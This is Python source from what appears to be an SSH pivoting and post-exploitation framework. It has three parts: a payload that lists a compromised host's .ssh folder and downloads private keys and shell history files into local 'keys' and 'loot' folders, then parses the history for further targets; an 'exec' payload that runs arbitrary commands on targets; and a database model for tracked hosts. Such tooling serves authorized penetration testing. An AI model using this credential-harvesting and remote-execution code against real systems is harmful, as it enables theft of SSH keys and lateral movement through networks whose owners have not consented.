            for target in targets.split(','):
                self.hostnameToIP(target)
        os.remove(filepath)


    def gatherKeys(self):
        files = []
        ret = []
        result = self.connection.conn.run("ls -A .ssh", hide="both", warn=True)
        for line in result.stdout.splitlines():
            if "rsa" in line or "key" in line or "p12" in line or "dsa" in line:
                files.append(line)
        for keyfile in files:
            c = self.getKeyToCreds(keyfile)

    def getKeyToCreds(self,keyfile,basePath=".ssh"):
        if basePath != ".":
            keyfile = os.path.join(basePath,keyfile)
        from baboossh.extensions import Extensions
        keysFolder = os.path.join(self.wspaceFolder,"keys")
        filename = str(self.connection.endpoint).replace(":","-")+"_"+str(self.connection.user)+"_"+keyfile.replace("/","_")
        filepath = os.path.join(keysFolder,filename)
        try:
            self.connection.conn.get(keyfile,filepath)
        except Exception as e:
            print(e)
            return None
        subprocess.run(["chmod","600",filepath])
        p = subprocess.run(["sha1sum",filepath], stdout=subprocess.PIPE)
        output = p.stdout.decode("utf-8")
        output = output.split(" ",1)[0]
        if output in self.keysHash.keys():
            if filepath != self.keysHash[output]:
                os.remove(filepath)
            return None
        valid,haspass = Extensions.auths["privkey"].checkKeyfile(filepath)
        if valid:
            self.keysHash[output] = filepath
            c= { "passphrase":"","keypath":filepath,"haspass":haspass}
            cred = Creds("privkey",json.dumps(c))
            if not self.connection.scope:
                cred.scope = False
            if cred.id is None:
                cred.found = self.connection.endpoint
                cred.save()
                self.newCreds.append(cred)
            return cred
        else:
            os.remove(filepath)
        return None

    def listHistoryFiles(self):
        ret = []
        result = self.connection.conn.run("ls -A", hide="both", warn=True)
        for line in result.stdout.splitlines():
            if "history" in line:
                ret.append(line)
        return ret

    def gatherFromHistory(self,historyFile):
        lootFolder = os.path.join(self.wspaceFolder,"loot")
        filename = str(self.connection.endpoint).replace(":","-")+"_"+str(self.connection.user)+"_"+historyFile.replace("/","_")
        filepath = os.path.join(lootFolder,filename)
        try:
            self.connection.conn.get(historyFile,filepath)
        except Exception as e:
            print(e)
            return None
        with open(filepath,"r",errors="ignore") as dledFile:
            data = dledFile.read()
        lines = data.splitlines()
        for line in lines:
            if re.search(r'^ *ssh ',line):
                option = ""
                words = line.split()
                host = False
                port = None
                user = None
                identity = None

                for i in range(1,len(words)):
                    if option != "":
                        if option == "identity":
                            identity = words[i]
                            if identity[:2] == '~/':
                                identity = identity[2:]
                        elif option == "port":
                            port = words[i]
                        option = ""
                    elif words[i][0] == "-":
                        if words[i] == "-i":
                            option = "identity"
                        elif words[i] == "-p":
                            option = "port"
                        else:
                            option = words[i]
                    elif not host:
                        if '@' in words[i]:
                            user,hostname = words[i].split("@",1)
                        else:
                            hostname = words[i]
                        host = True
                if not host:
                    continue
                endpoints = self.hostnameToIP(hostname,port)
                if user is not None:
                    user = User(user)
                    if not self.connection.scope:
                        user.scope = False
                    if user.id is None:
                        user.found = self.connection.endpoint
                        user.save()
                        self.newUsers.append(user)
                if identity is not None:
                    identity = self.getKeyToCreds(identity,".")




from baboossh.exceptions import ConnectionClosedError

class ExtStr(type):
    def __str__(self):
        return self.getKey()

class BaboosshExt(object,metaclass=ExtStr):
    @classmethod
    def getModType(cls):
        return "payload"

    @classmethod
    def getKey(cls):
        return "exec"

    @classmethod
    def descr(cls):
        return "Exec command on target"

    @classmethod
    def buildParser(cls,parser):
        parser.add_argument('cmd',nargs="+",help='Command to execute on target')

    @classmethod
    def run(cls, connection, wspaceFolder, stmt):
        if connection.conn is None:
            raise ConnectionClosedError
        command = " ".join(getattr(stmt,"cmd",["hostname"]))
        try:
            connection.conn.run(command,pty="vt100")
            #print(result.stdout,end='')
        except Exception as e:
            print("Error : "+str(e))
            return False
        return True
    



import json
import hashlib
from baboossh import Db
from baboossh.exceptions import NoPathError
from baboossh.utils import Unique


class Host(metaclass=Unique):
    """A machine with one or several :class:`Endpoint`

    This is used to aggregate endpoints as a single machine can have several
    interfaces with SSH listening on them. In order to prevent unecessary pivots,
    :class:`Path` s are calculated using the `Host` as sources as it might be
    longer to reach a `Host` from one endpoint rather than the other.

    The aggregation is checked by :func:`Connection.identify`, which is run on
    every endpoint newly connected. If every `Host` attribute matches with an
    existing Host, the endpoint is considered to belong to it and is added.

    Attributes:
        name (str): the hostname of the Host as returned by the command `hostname`
        id (int): the id of the Host
        uname (str): the output of the command `uname -a` on the Host
        issue (str): the content of the file `/etc/issue` on the Host
        machine_id (str): the content of the file `/etc/machine-id` on the Host
        macs ([str, ...]): a list of the MAC addresses of the Host interfaces
    """

    search_fields = ['name', 'uname']

    def __init__(self, hostname, uname, issue, machine_id, macs):
        self.hostname = hostname
        self.id = None
        self.uname = uname
        self.issue = issue
        self.machine_id = machine_id
        self.macs = macs
        cursor = Db.get().cursor()
        cursor.execute('SELECT id, name FROM hosts WHERE hostname=? AND uname=? AND issue=? AND machine_id=? AND macs=?', (self.hostname, self.uname, self.issue, self.machine_id, json.dumps(self.macs)))
        saved_host = cursor.fetchone()
        cursor.close()
        if saved_host is not None:
            self.id = saved_host[0]
            self.name = saved_host[1]
        else:
            if hostname != "":
                name = hostname.split(".")[0]
                if len(name) > 20:
                    name = name[:20]
                incr = 0
            else:
                name = "host"
                incr = 1

            self.name = None
            while self.name is None:
                fullname = name if incr == 0 else name+"_"+str(incr)
                cursor = Db.get().cursor()
                cursor.execute('SELECT id FROM hosts WHERE name=?', (fullname, ))
                if cursor.fetchone() is not None:
                    incr = incr + 1
                else:
                    self.name = fullname
                cursor.close()


    @classmethod
    def get_id(cls, hostname, uname, issue, machine_id, macs):
        return hashlib.sha256((hostname+uname+issue+machine_id+json.dumps(macs)).encode()).hexdigest()

    @property
    def scope(self):
        """Returns whether the `Host` is in scope

        A `Host` is in scope if all its :class:`Endpoint` s are in scope
        """

        for endpoint in self.endpoints:
            if not endpoint.scope:
                return False
        return True

    @scope.setter
    def scope(self, scope):
        for endpoint in self.endpoints:
            endpoint.scope = scope
            endpoint.save()

    @property
    def distance(self):
        """Returns the `Host` 's number of hops from `"Local"`"""

        cursor = Db.get().cursor()
        cursor.execute('SELECT distance FROM endpoints WHERE host=? ORDER BY distance DESC', (self.id, ))
        row = cursor.fetchone()
        cursor.close()
        return row[0]

    @property
    def closest_endpoint(self):
        """Returns the `Host` 's closest :class:`Endpoint`"""

        cursor = Db.get().cursor()
        cursor.execute('SELECT ip, port FROM endpoints WHERE host=? ORDER BY distance DESC', (self.id, ))
        row = cursor.fetchone()
        cursor.close()
        from baboossh import Endpoint
        return Endpoint(row[0], row[1])

    @property
    def endpoints(self):
        """Returns a `List` of the `Host` 's :class:`Endpoint` s"""
        from baboossh import Endpoint
        endpoints = []
        cursor = Db.get().cursor()
        for row in cursor.execute('SELECT ip, port FROM endpoints WHERE host=?', (self.id, )):
            endpoints.append(Endpoint(row[0], row[1]))
        cursor.close()
        return endpoints

    def save(self):
        """Saves the `Host` in the :class:`Workspace` 's database"""
        cursor = Db.get().cursor()
        if self.id is not None:
            #If we have an ID, the host is already saved in the database : UPDATE
            cursor.execute('''UPDATE hosts
                SET
                    name = ?,
                    hostname = ?,
                    uname = ?,
                    issue = ?,
                    machine_id = ?,
                    macs = ?
                WHERE id = ?''',
                           (self.name, self.hostname, self.uname, self.issue, self.machine_id, json.dumps(self.macs), self.id))
        else:
            #The host doesn't exists in database : INSERT
            cursor.execute('''INSERT INTO hosts(name, hostname, uname, issue, machine_id, macs)
                VALUES (?, ?, ?, ?, ?, ?) ''',
                           (self.name, self.hostname, self.uname, self.issue, self.machine_id, json.dumps(self.macs)))
            cursor.close()
            cursor = Db.get().cursor()
            cursor.execute('SELECT id FROM hosts WHERE name=?', (self.name, ))
            self.id = cursor.fetchone()[0]
        cursor.close()
        Db.get().commit()

    def delete(self):
        """Removes the `Host` from the :class:`Workspace`

        Recursively removes all :class:`Path` s starting from this `Host`
        """

        from baboossh import Path
        if self.id is None:
            return {}
        from baboossh.utils import unstore_targets_merge
        del_data = {}
        for path in Path.find_all(src=self):
            unstore_targets_merge(del_data, path.delete())
        for endpoint in self.endpoints:
            endpoint.host = None
            endpoint.save()
        cursor = Db.get().cursor()
        cursor.execute('DELETE FROM hosts WHERE id = ?', (self.id, ))
        cursor.close()
        Db.get().commit()
        unstore_targets_merge(del_data, {"Host":[type(self).get_id(self.hostname, self.uname, self.issue, self.machine_id, self.macs)]})
        return del_data

    @classmethod
    def find_all(cls, scope=None):
        """Returns a `List` of all `Host` s in the :class:`Workspace` matching the criteria

        Args:
            scope (bool): whether to return only `Host`s in scope (`True`),
                out of scope (`False`) or both (`None`)
            name (str): the `Host` s' name to match

        Returns:
            the `List` of `Host` s
        """

        ret = []
        cursor = Db.get().cursor()

        req = cursor.execute('SELECT hostname, uname, issue, machine_id, macs FROM hosts')

        for row in req:
            host = Host(row[0], row[1], row[2], row[3], json.loads(row[4]))
            if scope is None:
                ret.append(host)
            elif host.scope == scope:
                ret.append(host)
        cursor.close()
        return ret

    @classmethod
    def find_one(cls, host_id=None, name=None, prev_hop_to=None):
        """Find a `Host` by its id

        Args:
            host_id (int): the desired `Host` 's id
            name (str): the `Host` 's name to match

        Returns:
            A `Host` or `None`
        """

        if prev_hop_to is not None:
            from baboossh import Path
            paths = Path.find_all(dst=prev_hop_to)
            smallest_distance = None
            closest = None
            for path in paths:
                if path.src is None:
                    #Direct path found, we can stop here
                    return None
                if closest is None:
                    closest = path.src
                    smallest_distance = path.src.distance
                    continue
                if path.src.distance < smallest_distance:
                    closest = path.src
                    smallest_distance = path.src.distance
                    continue
            if closest is None:
                raise NoPathError
            return closest

        cursor = Db.get().cursor()
        if host_id is not None:
            cursor.execute('''SELECT hostname, uname, issue, machine_id, macs FROM hosts WHERE id=?''', (host_id, ))
        elif name is not None:
            cursor.execute('''SELECT hostname, uname, issue, machine_id, macs FROM hosts WHERE name=?''', (name, ))
        else:
            cursor.close()
            return None

        row = cursor.fetchone()
        cursor.close()
        if row is None:
            return None
        return Host(row[0], row[1], row[2], row[3], json.loads(row[4]))

    @classmethod
    def search(cls, field, val, show_all=False):
        """Search in the workspace for a `Host`

        Args:
            field (str): the `Host` attribute to search in
            val (str): the value to search for
            show_all (bool): whether to include out-of scope `Host` s in search results

        Returns:
            A `List` of `Host` s corresponding to the search.
        """

        if field not in cls.search_fields:
            raise ValueError
        ret = []
        cursor = Db.get().cursor()
        val = "%"+val+"%"
        #Ok this sounds fugly, but there seems to be no way to set a column name in a parameter. The SQL injection risk is mitigated as field must be in allowed fields, but if you find something better I take it
        for row in cursor.execute('SELECT hostname, uname, issue, machine_id, macs FROM hosts WHERE {} LIKE ?'.format(field), (val, )):
            ret.append(Host(row[0], row[1], row[2], row[3], json.loads(row[4])))
        if not show_all:
            ret = [host for host in ret if host.scope]
        return ret

    def __str__(self):
        return self.name
